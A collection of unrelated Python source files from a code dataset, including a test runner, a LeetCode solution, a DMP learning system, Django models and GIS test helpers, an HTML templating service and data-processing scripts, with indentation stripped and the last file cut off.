The frame's respective function's name.
line_number : `int`
The line's index where the exception occurred.
line : `str`
The frame's respective stripped line.
Returns
-------
should_show_frame : `bool`
Whether the frame should be shown.
"""
return (file_name != VAMPYTEST_TEST_FILE_PATH) or (name != '_get_module') or (line != '__import__(import_route)')
def try_collect_tests(test_file):
"""
Collects tests from the test files.
Parameters
----------
test_file : ``TestFile``
The test file to collect tests from.
Returns
-------
collection_successful : `bool`
Whether no exception occurred.
"""
try:
test_file.get_tests()
except TestLoadingError as err:
exception_parts = [
BREAK_LINE,
'\nException occurred meanwhile loading:\n',
test_file.path,
'\n',
]
render_exception_into(err.source_exception, exception_parts, filter=ignore_module_import_frame)
exception_parts.append(BREAK_LINE)
exception_parts.append('\n')
stdout.write(''.join(exception_parts))
collection_successful = False
else:
collection_successful = True
return collection_successful
def test_result_group_sort_key(test_result_group):
"""
Used to sort result test groups by their name.
Parameters
----------
test_result_group : ``ResultGroup``
Test result group to get sort key of.
Returns
-------
sort_key : `tuple` (`str`, `str`)
"""
case = test_result_group.case
key = (case.import_route, case.name)
return key
def run_tests_in(base_path, path_parts):
if is_file(base_path):
base_path, file_name = split_paths(base_path)
path_parts.insert(0, file_name)
if base_path in system_paths:
base_path_in_system_paths = True
else:
system_paths.append(base_path)
base_path_in_system_paths = False
try:
test_files = collect_test_files(base_path, path_parts)
stdout.write(f'Collected {len(test_files)} test file(s).\n')
test_files = [test_file for test_file in test_files if try_collect_tests(test_file)]
total_test_count = 0
for test_file in test_files:
total_test_count += len(test_file.get_tests())
stdout.write(f'Running {total_test_count} tests of {len(test_files)} files\n{BREAK_LINE}\n')
test_result_groups = []
for test_file in test_files:
for test in test_file.get_tests():
test_result_group = test.invoke()
test_result_groups.append(test_result_group)
test_result_groups.sort(key=test_result_group_sort_key)
failed_tests = []
passed_test_count = 0
skipped_test_count = 0
for test_result_group in test_result_groups:
if test_result_group.is_skipped():
skipped_test_count += 1
keyword = 'S'
elif test_result_group.is_passed():
passed_test_count += 1
keyword = 'P'
elif test_result_group.is_failed():
failed_tests.append(test_result_group)
keyword = 'F'
else:
keyword = '?'
case = test_result_group.case
stdout.write(f'{keyword} {case.import_route}.{case.name}\n')
stdout.write(f'{BREAK_LINE}\n')
for test_result_group in failed_tests:
for failure_message in test_result_group.iter_failure_messages():
stdout.write(failure_message)
stdout.write(f'\n{BREAK_LINE}\n')
stdout.write(f'{len(failed_tests)} failed | {skipped_test_count} skipped | {passed_test_count} passed\n')
finally:
if base_path_in_system_paths:
try:
system_paths.remove(base_path)
except ValueError:
pass
| StarcoderdataPython |
1740477 | <filename>600-699/650.py<gh_stars>0
class Solution:
def minSteps(self, n: int) -> int:
ans = 0
i = 2
while i * i <= n:
while n % i == 0:
n //= i
ans += i
i += 1
return ans + n if n != 1 else ans
| StarcoderdataPython |
3392599 |
LOCATIONS = {
"Utqiaġvik": {
"geolocation": (70.9, -156),
"name": "<NAME> <NAME>",
"papers": [""],
"data": {},
"description": """
<p>BW start of degradation in early 1950s mostly stable by early 2000s
(~90% IW studied stable) Kanesvskiy et al. (2017) </p>
"""
},
"<NAME>": {
"geolocation": (70.2288, -148.4186), ## location of Jorgenson et al. (2015)
"name": "<NAME>",
"data": {},
"papers": ["Raynolds et al. (2014)", "Jorgenson et al. (2015)" ],
"description": """
367 ha in 1968 -> 663 ha in 2010 with most of change after 1990 -- Raynolds et al. (2014).
Thermokarst extent was relatively small from 1949 (0.9%) to 1988
(1.5%), abruptly increased from 1988 to 2004 (6.3%), and increased
slightly from 2004 to 2012 (7.5%). Given that ice wedges occupy
32% of the upper 1 m of permafrost in the study area based on
the geometric method, we estimate that ~23% (7.5%/32%)
of the surface of the ice wedges has been degraded, but the
degradation was usually limited to the top ~0.5 m of the wedges.
-- Jorgenson et al. (2015)
"""
},
"NPRA": {
"geolocation": (70.25, -151.5), ## location of Jorgenson et al. (2015)
"name": "NPRA near Nuiqsut",
"data": {},
"papers": ["Jorgenson et al. (2003)", ],
"description": """
degradation thought to be due to warmer temperature in 1989 - 1998
--Jorgenson et al. (2003)
"""
},
"ACP": {
"geolocation": (70.25, -151.5), ## location of Jorgenson et al. (2015)
"name": "Arctic Coastal Plain",
"data": {},
"papers": [ ],
"description": """"""
}
}
| StarcoderdataPython |
3218551 | <reponame>LSDOlab/csdl
from csdl.core.variable import Variable
from csdl.core.output import Output
import csdl.operations as ops
from typing import List
import numpy as np
def matmat(mat1, mat2):
'''
This function can compute a matrix-matrix multiplication, similar to the
numpy counterpart.
**Parameters**
mat1: Variable
The first input for the matrix-matrix multiplication
mat2: Variable
The second input for the matrix-matrix multiplication
'''
if not (isinstance(mat1, Variable) and isinstance(mat2, Variable)):
raise TypeError("Arguments must both be Variable objects")
if not (len(mat1.shape) == 2 and len(mat2.shape) == 2):
raise ValueError(
"Arguments must both be matrices (rank 2 tensors); {} has shape {}, and {} has shape {}"
.format(
mat1.name,
mat1.shape,
mat2.name,
mat2.shape,
))
op = ops.matmat(mat1, mat2)
op.outs = [
Output(
None,
op=op,
shape=(mat1.shape[0], mat2.shape[1]),
),
]
# for out in op.outs:
# out.add_dependency_node(op)
return op.outs[0]
| StarcoderdataPython |
4809972 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""Created on Mon Oct 30 19:00:00 2017
@author: gsutanto
"""
import numpy as np
from scipy import signal
import os
import sys
import copy
sys.path.append(os.path.join(os.path.dirname(__file__), '../dmp_param/'))
sys.path.append(os.path.join(os.path.dirname(__file__), '../dmp_base/'))
sys.path.append(os.path.join(os.path.dirname(__file__), '../utilities/'))
from LearningSystem import *
from TransformSystemDiscrete import *
from FuncApproximatorDiscrete import *
from utilities import *
class LearningSystemDiscrete(LearningSystem, object):
"""Class for learning systems of discrete DMPs.
Implemented free of (or abstracted away from)
the type of state (DMPState/QuaternionDMPState/etc.).
The function getTargetForcingTermTraj() of transform_sys is the one
who shall take care of the particular state type being used
in its implementation underneath.
"""
def __init__(self, transformation_system_discrete, name=''):
super(LearningSystemDiscrete, self).__init__(transformation_system_discrete,
name)
def isValid(self):
assert (super(LearningSystemDiscrete, self).isValid())
return True
def learnApproximator(self, list_dmptrajectory_demo_local,
robot_task_servo_rate):
assert (self.isValid())
assert (robot_task_servo_rate > 0.0)
N_traj = len(list_dmptrajectory_demo_local)
assert (N_traj > 0)
list_Ft = [None] * N_traj
list_cX = [None] * N_traj
list_cV = [None] * N_traj
list_tau = [None] * N_traj
list_A_learn = [None] * N_traj
list_G = [None] * N_traj
list_PSI = [None] * N_traj
for i in range(N_traj):
dmptrajectory_demo_local = list_dmptrajectory_demo_local[i]
Ft_inst, cX_inst, cV_inst, tau_inst, tau_relative_inst, A_learn_inst, G_inst = self.transform_sys.getTargetForcingTermTraj(
dmptrajectory_demo_local, robot_task_servo_rate)
list_Ft[i] = Ft_inst
list_cX[i] = cX_inst
list_cV[i] = cV_inst
list_tau[i] = tau_inst
list_A_learn[i] = A_learn_inst
list_G[i] = G_inst
PSI_inst = self.transform_sys.func_approx.getBasisFunctionTensor(cX_inst)
list_PSI[i] = PSI_inst
mean_tau = np.mean(list_tau)
mean_A_learn = np.mean(list_A_learn, axis=0)
Ft = np.hstack(list_Ft)
cX = np.hstack(list_cX)
cV = np.hstack(list_cV)
G = np.hstack(list_G)
PSI = np.hstack(list_PSI)
if (self.transform_sys.canonical_sys.order == 2):
MULT = cV
elif (self.transform_sys.canonical_sys.order == 1):
MULT = cX
sx2 = np.sum(
np.matmul(
np.ones((self.transform_sys.func_approx.model_size, 1)),
np.square(MULT)) * PSI,
axis=1)
list_w = [None] * self.transform_sys.dmp_num_dimensions
for i in range(self.transform_sys.dmp_num_dimensions):
sxtd = np.sum(
np.matmul(
np.ones((self.transform_sys.func_approx.model_size, 1)),
(MULT * Ft[[i], :])) * PSI,
axis=1)
w_dim = sxtd * 1.0 / (sx2 + 1.e-10)
list_w[i] = w_dim.T
W = np.vstack(list_w)
assert (np.isnan(W).any() == False), 'Learned W contains NaN!'
self.transform_sys.func_approx.weights = W
self.transform_sys.A_learn = mean_A_learn
Fp = np.matmul(W, PSI) * np.matmul(
np.ones((self.transform_sys.dmp_num_dimensions, 1)),
(MULT * 1.0 / np.sum(PSI, axis=0).reshape(
(1, PSI.shape[1])))) # predicted forcing term
N_filter_order = 2 # Butterworth filter order
fc = 10.0 # cutoff frequency (in Hz)
fs = robot_task_servo_rate # sampling frequency (in Hz)
Wn = fc / (fs / 2)
[b, a] = signal.butter(N_filter_order, Wn)
Ft_filtered = signal.filtfilt(b, a, Ft, axis=1)
nmse_fit = computeNMSE(Fp.T, Ft_filtered.T)
print('NMSE of forcing term fitting = ' + str(nmse_fit))
return W, mean_A_learn, mean_tau, Ft, Fp, G, cX, cV, PSI
| StarcoderdataPython |
3380409 | # Listing_14-6.py
# Copyright Warren & <NAME>, 2013
# Released under MIT license http://www.opensource.org/licenses/mit-license.php
# Version $version ----------------------------
# HotDog class with cook(), add_condiments(), and __str__()
class HotDog:
def __init__(self):
self.cooked_level = 0
self.cooked_string = "Raw"
self.condiments = []
# Define the new __str__() method, which
# displays hot dog, including condiments
def __str__(self):
msg = "hot dog"
if len(self.condiments) > 0:
msg = msg + " with "
for i in self.condiments:
msg = msg+i+", "
msg = msg.strip(", ")
msg = self.cooked_string + " " + msg + "."
return msg
def cook(self, time):
self.cooked_level=self.cooked_level+time
if self.cooked_level > 8:
self.cooked_string = "Charcoal"
elif self.cooked_level > 5:
self.cooked_string = "Well-done"
elif self.cooked_level > 3:
self.cooked_string = "Medium"
else:
self.cooked_string = "Raw"
def addCondiment(self, condiment):
self.condiments.append(condiment)
myDog = HotDog() # create an instance
# test the methods
print myDog
print "Cooking hot dog for 4 minutes..."
myDog.cook(4)
print myDog
print "Cooking hot dog for 3 more minutes..."
myDog.cook(3)
print myDog
print "What happens if I cook it for 10 more minutes?"
myDog.cook(10)
print myDog
print "Now, I'm going to add some stuff on my hot dog"
myDog.addCondiment("ketchup")
myDog.addCondiment("mustard")
print myDog
| StarcoderdataPython |
30218 | from django.db import models
from django.contrib.postgres.fields import ArrayField
from django.urls import reverse
# Create your models here.
class Neighbourhood(models.Model):
image = models.ImageField(upload_to='neighbourhood_avatars', default='dummy_neighbourhood.jpg')
name = models.CharField(max_length=200)
location = models.CharField(max_length=200)
police_hotline= ArrayField(models.CharField(max_length=13, blank=True),size=3, blank=True, null=True)
hospital_hotline= ArrayField(models.CharField(max_length=13, blank=True),size=3, blank=True, null=True)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('home')
class Business(models.Model):
FOOD = 1
BEAUTY = 2
SOCIAL = 3
ENTERTAINMENT = 4
HOUSING = 5
BUSINESS_CATEGORIES = [
(FOOD, 'Food and Beverages'),
(BEAUTY, 'Beauty shops'),
(SOCIAL,'Social Amentity'),
(ENTERTAINMENT, 'Entertainment'),
(HOUSING, 'Housing'),
]
image = models.ImageField(upload_to='business_avatars', default='business.jpg')
name = models.CharField(max_length=200)
location = models.CharField(max_length=200)
description = models.TextField(blank=True, null=True)
category = models.PositiveSmallIntegerField(choices=BUSINESS_CATEGORIES)
neighbourhood = models.ForeignKey(Neighbourhood, on_delete=models.CASCADE, related_name='businesses')
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('neighbourhood', args=[self.neighbourhood.id])
@classmethod
def search_business(cls,search_term,hood):
return cls.objects.get(
models.Q(name__icontains = search_term),
models.Q(description__icontains =search_term),
models.Q(neighbourhood = hood)
) | StarcoderdataPython |
3366802 | import numpy as np
# Iterate!
def Init(fpix, K = 5):
'''
'''
# Compute the 1st order PLD model
fsap = np.sum(fpix, axis = 1)
A = fpix / fsap.reshape(-1,1)
w = np.linalg.solve(np.dot(A.T, A), np.dot(A.T, fsap))
model = np.dot(A, w)
fdet = fsap - model + 1
# The data matrix
F = np.array(fpix)
# Estimate S from PLD de-trended flux
S = 0.5 + np.array(fdet) / 2
S = np.ones_like(fdet)
# Estimate A with PCA
X = F / S.reshape(-1, 1)
X -= np.nanmedian(X, axis = 0)
U, _, _ = np.linalg.svd(X)
A = U[:,:K]
A = np.hstack((np.ones((fpix.shape[0], 1)), A))
return F, S, A
def Step(F, S, A):
'''
'''
# Dimensions
nt = F.shape[0]
# Update B
ATA = np.dot(A.T, (S ** 2)[:,None] * A)
ATF = np.dot(A.T, S[:,None] * F)
B = np.linalg.solve(ATA, ATF)
# Update A
b1 = B[0,:]
BBT = np.dot(B[1:], B[1:].T)
BFT = np.dot(B[1:], (F / S[:,None] - b1[None,:]).T)
A = np.hstack((np.ones(nt).reshape(-1,1), np.linalg.solve(BBT, BFT).T))
# Update S
M = np.dot(A, B)
S = np.sum(M * F, axis = 1) / np.sum(M * M, axis = 1)
return F, S, A
import h5py
import matplotlib.pyplot as plt
import numpy as np
f = h5py.File('archive.hdf5', 'a')
dset = f['images']
times = np.loadtxt('times.txt')
target = dset[150:190, 150:190, :]
comparison1 = dset[170:200, 185:220, :]
fractional_target = (target/np.sum(target, axis=(0, 1))).reshape((40*40, -1))
fractional_comp = (comparison1/np.sum(comparison1, axis=(0, 1))).reshape((comparison1.shape[0] * comparison1.shape[1]), -1)
F, S, A = Init(fractional_target.T)
for n in range(20):
F, S, A = Step(F, S, A)
F, S_c, A = Init(fractional_comp.T)
for n in range(20):
F, S_c, A = Step(F, S_c, A)
plt.plot(times, S/S_c, '.')
# plt.plot(S_c)
plt.show() | StarcoderdataPython |
1696651 | from typing import Any, List
from dataclasses import dataclass, field
from PyDS.Error import Empty
@dataclass
class Queue:
"""Implementation of Queue ADT
:param __capacity: The maximum number of elements a queue can hold
:type __capacity: int
:param __list: A container that holds n-elements in queue
:type __list: list[Any]
:param __front: The index pointing at front of queue
:type __front: int
:param __size: The size of the queue
:type __size: int
"""
__capacity: int = 64
__list: List[Any] = field(default_factory=lambda: [None] * Queue.__capacity)
__front: int = 0
__size: int = 0
def enqueue(self, value: Any) -> None:
"""Insertion to the tail of the queue
:param value: The value inserting to the tail
:type value: Any
"""
if self.__size == self.__capacity:
self.__resize(capacity=2 * self.__capacity)
end = (self.__front + self.__size) % self.__capacity
self.__list[end] = value
self.__size += 1
def dequeue(self) -> Any:
"""Deletion at the front of the queue
:return: A value at the front of queue
:rtype: Any
"""
if self.is_empty():
raise Empty("Queue is empty")
if 0 < self.__size < (self.__capacity // 4):
self.__resize(capacity=self.__capacity // 2)
value = self.__list[self.__front]
self.__list[self.__front] = None
self.__front = (self.__front + 1) % self.__capacity
self.__size -= 1
return value
def front(self) -> Any:
"""Gets value at front of queue
:return: A value at the front of queue
:rtype: Any
"""
if self.is_empty():
raise Empty("Queue is empty")
return self.__list[self.__front]
def is_empty(self) -> bool:
"""Checks to see if queue is empty
:return: Whether or not the queue's empty
:rtype: bool
"""
return self.__size == 0
def __resize(self, capacity: int) -> None:
"""Resize queue with twice the capacity"""
list_ = [None] * capacity
front = self.__front
for i in range(self.__size):
list_[i] = self.__list[front]
front = (front + 1) % self.__capacity
self.__front = 0
self.__list = list_
self.__capacity = capacity
def __len__(self) -> int:
return self.__size
def __str__(self) -> str:
if self.is_empty():
return 'Queue([])'
front = self.__front
output = 'Queue(['
for _ in range(self.__size - 1):
output += f'{self.__list[front]}, '
front = (front + 1) % self.__capacity
output += f'{self.__list[front]}])'
return output
| StarcoderdataPython |
130775 | import json
from typing import List
from injector import inject
from sqlalchemy import text
from infrastructure.dependency.scopes import IScoped
from infrastructure.json.JsonConvert import JsonConvert
from models.configs.ApplicationConfig import ApplicationConfig
@JsonConvert.register
class Pagination:
def __init__(self,
Filter: str = None,
Page: int = None,
PageUrl: str = None,
Limit: int = None,
TotalPage: int = None,
TotalCount: int = None
):
self.Filter: str = Filter
self.Page: int = Page
self.PageUrl: str = PageUrl
self.Limit: int = Limit
self.TotalPage: int = TotalPage
self.TotalCount: int = TotalCount
class HtmlTemplateService(IScoped):
@inject
def __init__(self,
application_config: ApplicationConfig
):
self.application_config: ApplicationConfig = application_config
@property
def default_css(self):
pagination_css = '''
.pagination {
display: table;
margin: 0 auto;
padding: 20px;
}
.pagination a {
color: black;
float: left;
padding: 8px 16px;
text-decoration: none;
transition: background-color .3s;
border: 1px solid #ddd;
}
.pagination a.active {
background-color: #4CAF50;
color: white;
border: 1px solid #4CAF50;
}
.pagination a:hover:not(.active) {background-color: #ddd;}
'''
return '''
.wrapper{
margin: 0 auto;
padding: 20px;
}
.container600 {
width: 300px;
max-width: 100%;
}
@media all and (max-width: 600px) {
.container600 {
width: 100% !important;
}
}
.col49 {
width: 49%;
}
.col2 {
width: 2%;
}
.col50 {
width: 50%;
}
@media all and (max-width: 599px) {
.fluid {
width: 100% !important;
}
.reorder {
width: 100% !important;
margin: 0 auto 10px;
}
.ghost-column {
display:none;
height:0;
width:0;
overflow:hidden;
max-height:0;
max-width:0;
}
}
.pdi-column{
text-align: left;
padding:4px;
font-family: Arial,sans-serif;
font-size: 12px;
line-height:10px;
}
.pdi-row{
text-align: left;
padding:4px;
font-family: Arial,sans-serif;
font-size: 10px;
line-height:10px;
}
.row-nowrap{
white-space: nowrap;
}
table {
border-collapse: collapse;
width: 100%;
}
th, td {
text-align: left;
padding: 8px;
}
tr:nth-child(even) {background-color: #f2f2f2;}
ul.breadcrumb {
padding: 10px 16px;
list-style: none;
background-color: #eee;
}
ul.breadcrumb li {
display: inline;
font-size: 18px;
}
ul.breadcrumb li+li:before {
padding: 8px;
color: black;
content: "/\00";
}
ul.breadcrumb li a {
color: #0275d8;
text-decoration: none;
}
ul.breadcrumb li a:hover {
color: #01447e;
text-decoration: underline;
}
''' + pagination_css
def mail_html_template(self, body, mail_css=None):
css = mail_css if mail_css is not None else self.default_css
template = f'''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title></title>
<style>{css}</style>
</head>
<body>
{body}
</body>
</html>
'''
return template
def get_nullable_dict_value(self, dict, key):
if key in dict:
return dict[key]
return None
def get_dict_value(self, dict, key):
if key in dict and dict[key] is not None:
return dict[key]
return ''
def prepare_table_data_dynamic(self, query, headers, prepare_row, sortable=None, pagination: Pagination = None):
if sortable is not None:
query = query.order_by(text(sortable))
pagination_json = None
if pagination is not None:
total_count = query.count()
if pagination.Limit is None or pagination.Limit < 1 or pagination.Limit > 200:
pagination.Limit = 50
total_page = int(total_count / pagination.Limit) + 1
if pagination.Page is None or pagination.Page < 1 or total_page < pagination.Page:
pagination.Page = 1
if pagination.Limit:
query = query.limit(pagination.Limit)
if pagination.Page:
offset = (pagination.Page - 1) * pagination.Limit
if offset is None or offset <= 0:
offset = 0
query = query.offset(offset)
pagination_json = {'PageUrl': pagination.PageUrl, 'PageNumber': pagination.Page, 'Limit': pagination.Limit,
'Count': total_count, 'TotalPage': total_page,'Filter':pagination.Filter}
rows = []
for data in query:
row = prepare_row(data)
rows.append(row)
return {'columns': headers, 'rows': rows,
'pagination': pagination_json}
def render_table(self, source, width=None):
columns: List[str] = self.get_nullable_dict_value(source, 'columns')
rows: List[str] = self.get_nullable_dict_value(source, 'rows')
pagination_json = self.get_nullable_dict_value(source, 'pagination')
headers = ''
headers = headers + f'<th scope="col" class="pdi-column">#</th>'
for column in columns:
column_style = self.get_dict_value(column, 'style')
column_class = self.get_dict_value(column, 'class')
column_value = self.get_dict_value(column, 'value')
headers = headers + f'<th scope="col" style="{column_style}" class="pdi-column {column_class}">{column_value}</th>'
bodies = ''
index = 0
for row in rows:
bodies = bodies + '<tr>'
index = index + 1
bodies = bodies + f'<td valign="top" class="pdi-row ">{index}</td>'
for data in row['data']:
row_style = self.get_dict_value(data, 'style')
row_class = self.get_dict_value(data, 'class')
row_value = self.get_dict_value(data, 'value')
bodies = bodies + f'<td valign="top" style="{row_style}" class="pdi-row {row_class}">{row_value}</td>'
bodies = bodies + '</tr>'
table_width = width if width is not None else '100%'
pagination_html = ''
if pagination_json is not None:
page_data = ""
# JsonConvert.register(Pagination)
pagination = JsonConvert.FromJSON(json.dumps(pagination_json))
# TotalPage = self.get_nullable_dict_value(pagination, 'TotalPage')
for page in range(1, pagination.TotalPage + 1):
filter=f'{pagination.Filter}' if pagination.Filter is not None and pagination.Filter!='' else ''
page_url = pagination.PageUrl.format(f'?PageNumber={page}&Limit={pagination.Limit}&Filter={filter}')
if page == pagination.PageNumber:
page_data = f'{page_data}<a href="{page_url}" class="active">{page}</a>'
else:
page_data = f'{page_data}<a href="{page_url}" >{page}</a>'
pagination_html = f'''
<div class="pagination">
{page_data}
</div>
'''
table = f'''
<table width="{table_width}" cellpadding="0" cellspacing="0" style="min-width:100%;">
<thead>
{headers}
</thead>
<tbody>
{bodies}
</tbody>
</table>
{pagination_html}
'''
return table
def render_html(self,
content,
):
body_content = f'''
<div class="wrapper">
<div class="crumb">
<ul class="breadcrumb">
<li><a href="/Home">Home</a></li>
<li><a href="/Connection">Connections</a></li>
<li><a href="/DataOperation">DataOperations</a></li>
<li><a href="/DataOperation/Job">Jobs</a></li>
<li><a href="/DataOperation/Job/Execution">Executions</a></li>
<li><a href="/documentation">Documentation (Swagger UI)</a></li>
</ul>
</div>
{content}
</div>
'''
mail_body = self.mail_html_template(body_content)
return mail_body
| StarcoderdataPython |
141613 | import sys, unittest
from django.utils.importlib import import_module
def geo_suite():
"""
Builds a test suite for the GIS package. This is not named
`suite` so it will not interfere with the Django test suite (since
spatial database tables are required to execute these tests on
some backends).
"""
from django.conf import settings
from django.contrib.gis.geos import GEOS_PREPARE
from django.contrib.gis.gdal import HAS_GDAL
from django.contrib.gis.utils import HAS_GEOIP
from django.contrib.gis.tests.utils import postgis, mysql
# The test suite.
s = unittest.TestSuite()
# Adding the GEOS tests.
from django.contrib.gis.geos import tests as geos_tests
s.addTest(geos_tests.suite())
# Tests that require use of a spatial database (e.g., creation of models)
test_apps = ['geoapp', 'relatedapp']
# Tests that do not require setting up and tearing down a spatial database.
test_suite_names = [
'test_measure',
]
# Tests applications that require a test spatial db.
if not mysql:
test_apps.append('distapp')
# Only PostGIS using GEOS 3.1+ can support 3D so far.
if postgis and GEOS_PREPARE:
test_apps.append('geo3d')
if HAS_GDAL:
# These tests require GDAL.
test_suite_names.extend(['test_spatialrefsys', 'test_geoforms'])
test_apps.append('layermap')
# Adding the GDAL tests.
from django.contrib.gis.gdal import tests as gdal_tests
s.addTest(gdal_tests.suite())
else:
print >>sys.stderr, "GDAL not available - no tests requiring GDAL will be run."
if HAS_GEOIP and hasattr(settings, 'GEOIP_PATH'):
test_suite_names.append('test_geoip')
# Adding the rest of the suites from the modules specified
# in the `test_suite_names`.
for suite_name in test_suite_names:
tsuite = import_module('django.contrib.gis.tests.' + suite_name)
s.addTest(tsuite.suite())
return s, test_apps
def run_gis_tests(test_labels, **kwargs):
"""
Use this routine as the TEST_RUNNER in your settings in order to run the
GeoDjango test suite. This must be done as a database superuser for
PostGIS, so read the docstring in `run_test()` below for more details.
"""
from django.conf import settings
from django.db.models import loading
from django.contrib.gis.tests.utils import mysql
# Getting initial values.
old_installed = settings.INSTALLED_APPS
old_root_urlconf = settings.ROOT_URLCONF
# Overridding the INSTALLED_APPS with only what we need,
# to prevent unnecessary database table creation.
new_installed = ['django.contrib.sites',
'django.contrib.sitemaps',
'django.contrib.gis',
]
# Setting the URLs.
settings.ROOT_URLCONF = 'django.contrib.gis.tests.urls'
# Creating the test suite, adding the test models to INSTALLED_APPS, and
# adding the model test suites to our suite package.
gis_suite, test_apps = geo_suite()
for test_model in test_apps:
module_name = 'django.contrib.gis.tests.%s' % test_model
if mysql:
test_module = 'tests_mysql'
else:
test_module = 'tests'
new_installed.append(module_name)
# Getting the model test suite
tsuite = import_module(module_name + '.' + test_module)
gis_suite.addTest(tsuite.suite())
# Resetting the loaded flag to take into account what we appended to
# the INSTALLED_APPS (since this routine is invoked through
# django/core/management, it caches the apps; this ensures that syncdb
# will see our appended models)
settings.INSTALLED_APPS = new_installed
loading.cache.loaded = False
# Running the tests using the GIS test runner.
result = run_tests(test_labels, suite=gis_suite, **kwargs)
# Restoring modified settings.
settings.INSTALLED_APPS = old_installed
settings.ROOT_URLCONF = old_root_urlconf
return result
def run_tests(test_labels, verbosity=1, interactive=True, extra_tests=[], suite=None):
"""
Set `TEST_RUNNER` in your settings with this routine in order to
scaffold test spatial databases correctly for your GeoDjango models.
For more documentation, please consult the following URL:
http://geodjango.org/docs/testing.html.
"""
from django.conf import settings
from django.db import connection
from django.db.models import get_app, get_apps
from django.test.simple import build_suite, build_test, reorder_suite, TestCase
from django.test.utils import setup_test_environment, teardown_test_environment
# The `create_test_spatial_db` routine abstracts away all the steps needed
# to properly construct a spatial database for the backend.
from django.contrib.gis.db.backend import create_test_spatial_db
# Setting up for testing.
setup_test_environment()
settings.DEBUG = False
old_name = settings.DATABASE_NAME
# Creating the test spatial database.
create_test_spatial_db(verbosity=verbosity, autoclobber=not interactive)
# The suite may be passed in manually, e.g., when we run the GeoDjango test,
# we want to build it and pass it in due to some customizations. Otherwise,
# the normal test suite creation process from `django.test.simple.run_tests`
# is used to create the test suite.
if suite is None:
suite = unittest.TestSuite()
if test_labels:
for label in test_labels:
if '.' in label:
suite.addTest(build_test(label))
else:
app = get_app(label)
suite.addTest(build_suite(app))
else:
for app in get_apps():
suite.addTest(build_suite(app))
for test in extra_tests:
suite.addTest(test)
suite = reorder_suite(suite, (TestCase,))
# Executing the tests (including the model tests), and destorying the
# test database after the tests have completed.
result = unittest.TextTestRunner(verbosity=verbosity).run(suite)
connection.creation.destroy_test_db(old_name, verbosity)
teardown_test_environment()
# Returning the total failures and errors
return len(result.failures) + len(result.errors)
| StarcoderdataPython |
136874 | <reponame>glaudsonml/kurgan-ai<gh_stars>10-100
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.data import logger
from lib.core.settings import IS_WIN
from lib.core.settings import PLATFORM
_readline = None
try:
from readline import *
import readline as _readline
except ImportError:
try:
from pyreadline import *
import pyreadline as _readline
except ImportError:
pass
if IS_WIN and _readline:
try:
_outputfile = _readline.GetOutputFile()
except AttributeError:
debugMsg = "Failed GetOutputFile when using platform's "
debugMsg += "readline library"
logger.debug(debugMsg)
_readline = None
# Test to see if libedit is being used instead of GNU readline.
# Thanks to <NAME> for this patch.
uses_libedit = False
if PLATFORM == 'mac' and _readline:
import commands
(status, result) = commands.getstatusoutput("otool -L %s | grep libedit" % _readline.__file__)
if status == 0 and len(result) > 0:
# We are bound to libedit - new in Leopard
_readline.parse_and_bind("bind ^I rl_complete")
debugMsg = "Leopard libedit detected when using platform's "
debugMsg += "readline library"
logger.debug(debugMsg)
uses_libedit = True
# the clear_history() function was only introduced in Python 2.4 and is
# actually optional in the readline API, so we must explicitly check for its
# existence. Some known platforms actually don't have it. This thread:
# http://mail.python.org/pipermail/python-dev/2003-August/037845.html
# has the original discussion.
if _readline:
try:
_readline.clear_history()
except AttributeError:
def clear_history():
pass
_readline.clear_history = clear_history
| StarcoderdataPython |
1635372 | <gh_stars>1-10
"""
Copyright 2018 Inmanta
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contact: <EMAIL>
"""
import inmanta.compiler as compiler
from inmanta.ast import Namespace
def test_multiline_string_interpolation(snippetcompiler):
snippetcompiler.setup_for_snippet(
"""
var = 42
str = \"\"\"var == {{var}}\"\"\"
""",
)
(_, scopes) = compiler.do_compile()
root: Namespace = scopes.get_child("__config__")
assert root.lookup("str").get_value() == "var == 42"
| StarcoderdataPython |
14707 | import os
import pandas as pd
import spacy
from sklearn.feature_extraction.text import CountVectorizer
import datetime
import numpy as np
from processing import get_annee_scolaire
if __name__ == "__main__":
#print("files", os.listdir("data_processed"))
##########################
# Chargement des données
##########################
path_g = os.path.join("data_processed", "greves.pk")
g = pd.read_pickle(path_g)
g["ind"] = g.ind.map(lambda x: 1 if x == "GREVE" else 0)
g = g[["taux_grevistes", "nos", "ind", "greves_manquantes"]]
path_m = os.path.join("data_processed", "menus.pk")
m = pd.read_pickle(path_m)
path_fe = os.path.join("data_processed", "frequentation_effectif.pk")
fe = pd.read_pickle(path_fe)
path_ferie = os.path.join("data_processed", "feries.pk")
feries = pd.read_pickle(path_ferie)
path_vacs = os.path.join("data_processed", "vacances.pk")
vacances = pd.read_pickle(path_vacs)
path_epidemies = os.path.join("data_processed", "epidemies.pk")
epidemies = pd.read_pickle(path_epidemies)
path_religions = os.path.join("data_processed", "religions.pk")
religions = pd.read_pickle(path_religions)
##########################
# Join sur les dates des différentes BDD
##########################
df = fe.groupby("date")[["prevision", "reel", "effectif"]].sum().join(g).join(m).join(feries).join(vacances).join(epidemies).join(religions)
##########################
# Remplacement des valeurs manquantes
##########################
for col in df.isnull().sum()[df.isnull().sum()>0].index.drop("menu"):
df[col] = df[col].fillna(0)
df["menu"] = df["menu"].map(lambda x: x if type(x) == list else [])
####################################
# Ajout des jours, mois semaines, année scolaire, repas noel
####################################
dic_jour = {0: "Lundi", 1: "Mardi", 2: "Mercredi", 3: "Jeudi", 4: "Vendredi", 5: "Samedi", 6: "Dimanche"}
dic_mois = {1: "Janvier", 2: "Fevrier", 3: "Mars", 4: "Avril", 5: "Mai", 6: "Juin", 7: "Juillet", 8: "Aout",
